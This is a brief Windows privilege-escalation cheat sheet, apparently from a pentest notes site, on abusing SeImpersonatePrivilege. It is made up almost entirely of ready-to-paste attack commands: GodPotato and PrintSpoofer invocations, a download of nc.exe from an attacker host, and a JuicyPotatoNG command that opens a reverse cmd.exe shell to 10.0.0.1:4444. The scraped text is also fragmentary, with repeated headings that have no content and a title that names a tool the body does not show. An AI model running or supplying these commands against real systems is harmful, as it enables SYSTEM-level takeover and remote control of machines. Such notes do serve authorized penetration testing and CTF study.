Windows PrivEsc with LocalPotato
SeImpersonatePrivilege
GodPotato -cmd "cmd /c whoami"
Copied!
SeImpersonatePrivilege
orSeAssignPrimaryToken
Before exploiting, we need to upload nc.exe
(it is available from here) to the target machine.
Invoke-WebRequest -Uri http://10.0.0.1:8000/nc.exe -OutFile c:\Temp\nc.exe
Copied!
Next start a listener in local machine.
nc -lvnp 4444
Copied!
Then execute JuicyPotato
in target machine.
JuicyPotatoNG.exe -t * -p "c:\Temp\nc.exe" -a "10.0.0.1 4444 -e cmd.exe"
Copied!
SeImpersonatePrivilege
PrintSpoofer.exe -i -c cmd
Copied!
SeImpersonatePrivilege
SeImpersonatePrivilege
References
Last updated